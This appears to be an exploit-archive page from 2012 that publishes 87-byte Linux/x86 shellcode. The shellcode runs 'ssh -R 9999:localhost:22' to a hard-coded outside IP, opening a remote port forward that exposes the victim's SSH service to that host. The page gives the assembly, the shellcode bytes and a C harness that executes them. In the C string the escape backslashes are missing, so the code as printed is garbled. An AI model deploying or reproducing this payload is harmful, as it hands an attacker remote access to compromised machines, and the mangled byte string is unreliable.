[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Linux/x86 Remote Port Forwarding Shellcode 87 bytes
# Published : 2012-12-24
# Author :
# Previous Title : BSD x86 connect back Shellcode (81 bytes)
# Next Title : w32-speaking-shellcode
*****************************************************
* Linux/x86 Remote Port forwarding 87 bytes *
* ssh -R 9999:localhost:22 192.168.0.226 *
*****************************************************
* Author: Hamza Megahed *
*****************************************************
* Twitter: @Hamza_Mega *
*****************************************************
* blog: hamza-mega[dot]blogspot[dot]com *
*****************************************************
* E-mail: hamza[dot]megahed[at]gmail[dot]com *
*****************************************************
xor %eax,%eax
push %eax
pushl $0x3632322e
pushl $0x30302e38
pushl $0x36312e32
pushw $0x3931
movl %esp,%esi
push %eax
push $0x32323a74
push $0x736f686c
push $0x61636f6c
push $0x3a393939
pushw $0x3930
movl %esp,%ebp
push %eax
pushw $0x522d
movl %esp,%edi
push %eax
push $0x6873732f
push $0x6e69622f
push $0x7273752f
movl %esp,%ebx
push %eax
push %esi
push %ebp
push %edi
push %ebx
movl %esp,%ecx
mov $0xb,%al
int $0x80
********************************
#include <stdio.h>
#include <string.h>
char *shellcode =
"x31xc0x50x68x2ex32x32x36x68x38x2ex30x30x68x32x2ex31x36"
"x66x68x31x39x89xe6x50x68x74x3ax32x32x68x6cx68x6fx73x68"
"x6cx6fx63x61x68x39x39x39x3ax66x68x30x39x89xe5x50x66x68"
"x2dx52x89xe7x50x68x2fx73x73x68x68x2fx62x69x6ex68x2fx75"
"x73x72x89xe3x50x56x55x57x53x89xe1xb0x0bxcdx80";
int main(void)
{
fprintf(stdout,"Length: %dn",strlen(shellcode));
(*(void(*)()) shellcode)();
return 0;
}